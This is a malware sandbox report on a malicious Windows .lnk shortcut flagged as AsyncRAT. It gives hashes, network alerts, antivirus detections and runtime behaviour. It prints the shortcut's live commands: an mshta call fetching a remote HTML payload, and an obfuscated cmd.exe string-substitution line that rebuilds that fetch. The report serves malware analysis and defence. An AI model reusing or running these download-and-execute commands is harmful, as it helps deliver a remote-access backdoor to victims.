popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

notice_may.3_23377.lnk

Generic Malware OS Processor Check AntiVM AntiDebug GIF Format
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us May 4, 2023, 10:04 a.m. May 4, 2023, 10:06 a.m.
Size 75.7KB
Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Fri Apr 9 04:50:10 2021, mtime=Tue May 2 06:05:31 2023, atime=Fri Apr 9 04:50:10 2021, length=289792, window=hidenormalshowminimized
MD5 af543d8033c932f504f309c0d9760cbc
SHA256 e6f07bf2d3a44eefe22b64ecb5513a6cad5039df5fe055afff6a5c5098750265
CRC32 FD0EAAA9
ssdeep 1536:fG+sVOVnebn0wC0eklKuikz1sZugWkWphQzuW6:BLeYoGkz1s2kWpKb6
Yara
  • OS_Processor_Check_Zero - OS Processor Check
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Lnk_Format_Zero - LNK Format
  • Generic_Malware_Zero - Generic Malware

Name Response Post-Analysis Lookup
corporacionhardsoft.com
A 192.3.201.85
192.3.201.85
IP Address Status Action
164.124.101.2 Active Moloch
192.3.201.85 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49165 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49165 -> 192.3.201.85:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.3.201.85:443 -> 192.168.56.103:49165 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49165 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49166 -> 192.3.201.85:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.3.201.85:443 -> 192.168.56.103:49166 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49166 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 192.3.201.85:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 192.3.201.85:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.3.201.85:443 -> 192.168.56.103:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
file C:\Users\test22\AppData\Local\Temp\notice_may.3_23377.lnk
cmdline mshta https://corporacionhardsoft.com/x/file.html
cmdline "C:\Windows\System32\cmd.exe" cmd.exe /V:ON/C"set vEzl=mshty httYxs7jjcorYxorycionhyrdsoft.comjxjfile.html&&set SfE=!vEzl:Yx=p!&&set gu=!SfE:y=a!&&set 9qk=!gu:j=/!&&set vwp=!9qk:7=:!&&call %vwp%"
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2276
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef80000
process_handle: 0xffffffff
1 0 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegSetValueExA

 key_handle: 0x000002bc
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
FireEye Heur.BZC.YAX.Pantera.117.25B8D75D
ALYac Heur.BZC.YAX.Pantera.117.25B8D75D
VIPRE Heur.BZC.YAX.Pantera.117.25B8D75D
Arcabit Heur.BZC.YAX.Pantera.117.25B8D75D
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.117.25B8D75D
MicroWorld-eScan Heur.BZC.YAX.Pantera.117.25B8D75D
Emsisoft Heur.BZC.YAX.Pantera.117.25B8D75D (B)
TrendMicro HEUR_LNKEXEC.A
SentinelOne Static AI - Suspicious LNK
Microsoft Trojan:Script/Wacatac.B!ml
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Pantera.117.25B8D75D
Google Detected
MAX malware (ai score=88)
VBA32 Trojan.Link.DoubleRun
Zoner Probably Heur.LNKScript
Rising Trojan.Starter/LNK!1.BE88 (CLASSIC)
Ikarus Trojan.LNK.Agent
Process injection Process 1020 resumed a thread in remote process 2168
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002ec
suspend_count: 1
process_identifier: 2168
1 0 0